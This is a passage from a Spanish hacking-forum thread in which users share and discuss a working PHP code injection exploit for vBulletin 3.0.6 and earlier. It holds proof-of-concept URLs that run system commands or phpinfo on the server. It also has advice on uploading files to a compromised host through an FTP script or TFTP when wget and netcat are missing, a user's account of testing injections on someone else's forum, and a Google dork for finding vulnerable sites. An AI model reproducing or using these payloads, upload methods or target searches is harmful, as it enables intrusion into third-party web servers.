elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 21:55  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  vBulletin <= 3.0.6 php Code Injection		 0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: vBulletin <= 3.0.6 php Code Injection  (Leído 3,779 veces)
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #15 en: 18 Marzo 2005, 05:07 »
el problema es que con wget, pues no me deja xD por eso me tengo que complicar con el ftp :( probe lo del netcat, pero no lo tiene, a ver si me podeis decir como podria subirlo por ftp, o por algun otro sistema que no sea wget, hmmm he pensado.. en registrarme en el foro, ponermelo de avatar, pero con extension .jpg y luego renombrarlo, se me acaba de ocurrir, lo voy a probar  aver si funciona, ya os contare ;)
En línea
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #16 en: 18 Marzo 2005, 06:30 »
Mu raro que no tenga el Wget ni el Netcat.

Siempre puedes hacerte un script FTP via comandos con "echo" y luego ejecutar el ftp con la opcion "-s" creo que era.

Mas a webo no te lo puedo poner macho xD.

O te pones un servidor TFTP en tu PC o donde te de la gana, y usas el metodo antiguo que se usaba para petar IIS con el Unicode/Decode xDDDD

Salu2
En línea
Blog: http://rafaelmbaez.blogspot.com
Twitter: http://twitter.com/rafaelmbaez
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #17 en: 18 Marzo 2005, 06:33 »
jeje oks, gracias Rojodos ;)
« Última modificación: 18 Marzo 2005, 06:38 por alb3rt0 » En línea
Sarasa1

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #18 en: 26 Marzo 2005, 14:32 »
Hola!!

QUe tal? tengo una pregunta....

Estoy probando en un foro 3.0.1 y cuando intengo poner alguna inyecion, la pagina se pone toda en blanco sin nada... osea se pone todo en blanco y no hay nada.... que se supone que deberia pasar? o hacer ?


:S Alguien me explicaria?? :) :-*
En línea
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #19 en: 26 Marzo 2005, 23:34 »
pues ya esta parcheada, al poner por ejemplo el comando phpinfo, te saldria la info del php, al poenr id, te saldria tu id... xD, bueno suerte ;)
En línea
leo_lemonades

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #20 en: 10 Abril 2005, 00:32 »
Cita de: EL_ZoRRo en 23 Febrero 2005, 09:16
Código:
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]


Probado y funciona .

Salu2

¿Y esto cómo se ejecuta?
En línea
leo_lemonades

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #21 en: 10 Abril 2005, 00:34 »
Cita de: EL_ZoRRo en 23 Febrero 2005, 09:16
Código:
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]


Probado y funciona .

Salu2

¿Y ESTO COMO SE EJECUTA? ¿NECESITO ALGÚN PROGRAMA EN WINDOWS?  ???
En línea
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #22 en: 10 Abril 2005, 02:38 »
mas claro agua...

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
En línea
LordLinux

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: vBulletin <= 3.0.6 php Code Injection
« Respuesta #23 en: 20 Abril 2005, 09:13 »
PAra los que nunca llegan a probarlos : http://www.google.es/search?q=Powered+by:+vBulletin+Version+3.0.1
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Google.com vulnerable to XSS (HTML Code Injection)
Bugs y Exploits 		TinKode 9 2,112 Último mensaje 3 Diciembre 2010, 23:33
por TinKode
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines